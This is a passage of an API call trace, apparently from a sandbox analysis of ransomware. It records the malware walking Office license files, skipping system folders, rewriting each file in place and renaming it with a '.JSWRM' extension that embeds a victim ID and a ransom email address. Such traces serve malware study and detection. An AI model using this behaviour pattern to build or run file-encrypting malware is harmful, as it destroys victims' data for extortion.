lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0107.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0107.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0107.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0107.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0107.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0107.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.087] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe88e0fbb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe88e0fbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe89ec011, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointVL_MAK-pl.xrm-ms", cAlternateFileName="PO1F57~1.XRM")) returned 1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.087] lstrcmpiW (lpString1="PowerPointVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0107.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0107.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0107.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0107.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0107.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0107.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0107.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0107.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0107.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0107.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0107.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0107.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.088] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0107.088] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0107.088] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0107.091] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.091] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0107.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.091] CloseHandle (hObject=0x45c) returned 1 [0107.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0107.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0107.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0107.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0107.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.092] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0107.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0107.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0107.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0107.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0107.093] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8894afa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8894afa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe89536b8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a4d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointVL_MAK-ppd.xrm-ms", cAlternateFileName="PO8F84~1.XRM")) returned 1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.093] lstrcmpiW (lpString1="PowerPointVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0107.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0107.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0107.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0107.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0107.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241038, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0107.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0107.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0107.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0107.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.094] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6733) returned 1 [0107.094] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a40) returned 0x205850 [0107.094] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a40, lpOverlapped=0x0) returned 1 [0107.100] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.100] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a40, lpOverlapped=0x0) returned 1 [0107.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0107.100] CloseHandle (hObject=0x45c) returned 1 [0107.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0107.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0107.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0107.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0107.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.100] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0107.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0107.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0107.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0107.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0107.101] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe88223de, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe88223de, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe892d45f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d51, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointVL_MAK-ul-oob.xrm-ms", cAlternateFileName="PO22BE~1.XRM")) returned 1 [0107.101] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.101] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.101] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.101] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.101] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.101] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.101] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.102] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.102] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.102] lstrcmpiW (lpString1="PowerPointVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0107.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0107.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2411f0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0107.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0107.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0107.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241380, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0107.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0107.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0107.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.103] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11601) returned 1 [0107.103] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0107.103] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0107.106] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.106] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0107.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.107] CloseHandle (hObject=0x45c) returned 1 [0107.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.107] MultiByteToWideChar (in: CodePage=0x0, 